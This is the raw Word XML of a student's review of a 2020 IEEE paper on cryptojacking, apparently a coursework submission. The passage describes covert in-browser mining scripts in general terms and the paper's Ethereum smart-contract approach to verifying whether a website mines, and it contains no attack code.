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EA1F4" w14:textId="6C64CEC6" w:rsidR="00CB5D7F" w:rsidRPr="009D05C2" w:rsidRDefault="00A20380" w:rsidP="00A20380">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D05C2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Verification of Cryptocurrency Mining Using Ethereum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5953BA" w14:textId="37DE48A1" w:rsidR="00B97560" w:rsidRDefault="00B97560" w:rsidP="00B37D4D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659526D2" w14:textId="77777777" w:rsidR="009D05C2" w:rsidRDefault="009D05C2" w:rsidP="00B37D4D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5382"/>
        <w:gridCol w:w="3968"/>
      </w:tblGrid>
      <w:tr w:rsidR="00517041" w14:paraId="28479828" w14:textId="77777777" w:rsidTr="00517041">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5382" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FB35E51" w14:textId="3C9D4461" w:rsidR="00517041" w:rsidRDefault="00517041" w:rsidP="00B37D4D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="cs"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:rtl/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>عبدالرحمن</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="cs"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:rtl/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve"> محمد سالم حسن</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3968" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F36116F" w14:textId="310A43D0" w:rsidR="00517041" w:rsidRPr="009D05C2" w:rsidRDefault="00517041" w:rsidP="00517041">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:rtl/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D05C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:rtl/>
              </w:rPr>
              <w:t>الاسم</w:t>
            </w:r>
            <w:r w:rsidRPr="009D05C2">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:rtl/>
              </w:rPr>
              <w:t xml:space="preserve"> كما يظهر في كشوف الكلية</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00517041" w14:paraId="14AF3B65" w14:textId="77777777" w:rsidTr="00517041">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5382" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DA4FF49" w14:textId="250A1E32" w:rsidR="00517041" w:rsidRDefault="00517041" w:rsidP="00B37D4D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="cs"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:rtl/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>9202794</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3968" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DE27BAC" w14:textId="08875B67" w:rsidR="00517041" w:rsidRPr="00517041" w:rsidRDefault="00517041" w:rsidP="00B37D4D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D05C2">
              <w:rPr>
                <w:rFonts w:hint="cs"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:rtl/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>رقم الطالب</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D30F63C" w14:textId="63E57885" w:rsidR="00517041" w:rsidRDefault="00517041" w:rsidP="00B37D4D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="754D7715" w14:textId="77777777" w:rsidR="009D05C2" w:rsidRDefault="009D05C2" w:rsidP="00B37D4D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2142"/>
        <w:gridCol w:w="7208"/>
      </w:tblGrid>
      <w:tr w:rsidR="009D05C2" w14:paraId="09C442D3" w14:textId="77777777" w:rsidTr="00854AE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29A934A8" w14:textId="6DEA2745" w:rsidR="009D05C2" w:rsidRPr="009D05C2" w:rsidRDefault="009D05C2" w:rsidP="009D05C2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D05C2">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Subject of the paper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7208" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B55E879" w14:textId="0BD76A3B" w:rsidR="009D05C2" w:rsidRDefault="009D05C2" w:rsidP="00B37D4D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Crypto Currency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D05C2" w14:paraId="223DDBF3" w14:textId="77777777" w:rsidTr="00854AE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49445C76" w14:textId="3FFF574E" w:rsidR="009D05C2" w:rsidRDefault="009D05C2" w:rsidP="009D05C2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D05C2">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Paper Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7208" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E9C0377" w14:textId="1EA0D1EB" w:rsidR="009D05C2" w:rsidRDefault="00BD1574" w:rsidP="00B37D4D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD1574">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Verification of Cryptocurrency Mining Using Ethereum</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D05C2" w14:paraId="2001A529" w14:textId="77777777" w:rsidTr="00854AE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A2BCC73" w14:textId="0EF22136" w:rsidR="009D05C2" w:rsidRDefault="009D05C2" w:rsidP="009D05C2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D05C2">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Authors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7208" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D4F2315" w14:textId="0A110618" w:rsidR="009D05C2" w:rsidRDefault="00BD1574" w:rsidP="00B37D4D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD1574">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Dong-Her Shih, Ting-Wei Wu, Tzu-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD1574">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Hsin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BD1574">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve"> Hsu, Po-Yuan Shih, David C. Yen.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D05C2" w14:paraId="57CF2D41" w14:textId="77777777" w:rsidTr="00854AE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A29E923" w14:textId="3A1F662E" w:rsidR="009D05C2" w:rsidRDefault="009D05C2" w:rsidP="00B37D4D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D05C2">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Publication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7208" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34E1DC5A" w14:textId="451C2264" w:rsidR="009D05C2" w:rsidRDefault="00BD1574" w:rsidP="00B37D4D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>IEEE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D05C2" w14:paraId="137696B1" w14:textId="77777777" w:rsidTr="00854AE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4207F82C" w14:textId="2492C2BD" w:rsidR="009D05C2" w:rsidRDefault="009D05C2" w:rsidP="009D05C2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D05C2">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Year of publication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7208" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46C8767E" w14:textId="4F00D2D9" w:rsidR="009D05C2" w:rsidRDefault="00BD1574" w:rsidP="00B37D4D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00854AE4" w14:paraId="00B58100" w14:textId="77777777" w:rsidTr="00854AE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2142" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AA246F9" w14:textId="7C79F76E" w:rsidR="00854AE4" w:rsidRPr="009D05C2" w:rsidRDefault="00854AE4" w:rsidP="009D05C2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Paper link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7208" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E899F69" w14:textId="12E5BC12" w:rsidR="00854AE4" w:rsidRDefault="00000000" w:rsidP="00854AE4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidR="00854AE4" w:rsidRPr="00854AE4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="36"/>
                  <w:szCs w:val="36"/>
                  <w:lang w:bidi="ar-EG"/>
                </w:rPr>
                <w:t>https://ieeexplore.ieee.org/document/9127452</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EEED8EB" w14:textId="61E108D7" w:rsidR="00517041" w:rsidRDefault="00517041" w:rsidP="00B37D4D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47FEEC89" w14:textId="77777777" w:rsidR="00517041" w:rsidRDefault="00517041" w:rsidP="00B37D4D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B2CEB9" w14:textId="56B15F14" w:rsidR="00B97560" w:rsidRDefault="00B97560" w:rsidP="00B37D4D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D99743B" w14:textId="330CDFD7" w:rsidR="00B97560" w:rsidRDefault="00B97560" w:rsidP="00B37D4D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF3FDDF" w14:textId="1E5F016C" w:rsidR="00B97560" w:rsidRDefault="00B97560" w:rsidP="00B37D4D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148137C7" w14:textId="65518589" w:rsidR="00B97560" w:rsidRDefault="00B97560" w:rsidP="00125B75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="037CC74B" w14:textId="77777777" w:rsidR="00125B75" w:rsidRDefault="00125B75" w:rsidP="00125B75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6053F27E" w14:textId="25FD14F6" w:rsidR="00B97560" w:rsidRPr="00C829DC" w:rsidRDefault="00B97560" w:rsidP="00B97560">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Paper Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8BA2D1" w14:textId="03ED7960" w:rsidR="002A2902" w:rsidRDefault="00B97560" w:rsidP="00205FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="005D29AE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">paper discuss a new thread in the recent years which is called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005D29AE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Cryptojacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005D29AE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005D29AE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Cryptojacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005D29AE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> has many types but the paper discuss only one type which is web mining where a web administrator or attacker insert a web mining </w:t>
      </w:r>
      <w:r w:rsidR="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="005D29AE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the website </w:t>
      </w:r>
      <w:r w:rsidR="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">script </w:t>
      </w:r>
      <w:r w:rsidR="005D29AE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">code that could do some mining on the victim device without his knowledge or approval </w:t>
      </w:r>
      <w:r w:rsidR="000E38BE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">to obtain some </w:t>
      </w:r>
      <w:r w:rsidR="002A2902" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">hardware </w:t>
      </w:r>
      <w:r w:rsidR="000E38BE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">resources </w:t>
      </w:r>
      <w:r w:rsidR="005D29AE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">for free </w:t>
      </w:r>
      <w:r w:rsidR="000E38BE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">(this mostly is a monetization model that replaces advertising as a source of profit for the website) </w:t>
      </w:r>
      <w:r w:rsidR="005D29AE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>and introduce</w:t>
      </w:r>
      <w:r w:rsidR="000E38BE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="005D29AE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> a simple example how this can be done, and then introduced </w:t>
      </w:r>
      <w:r w:rsidR="00AA44F9" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>a simplified solution to verify whether this website preform mining or not using smart contracts (which is the basis for the blockchain of Ethereum where Ethereum is one of the cryptocurrencies) and also using decentralized apps (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA44F9" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>dAp</w:t>
      </w:r>
      <w:r w:rsidR="000E38BE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00AA44F9" w:rsidRPr="00C829DC">
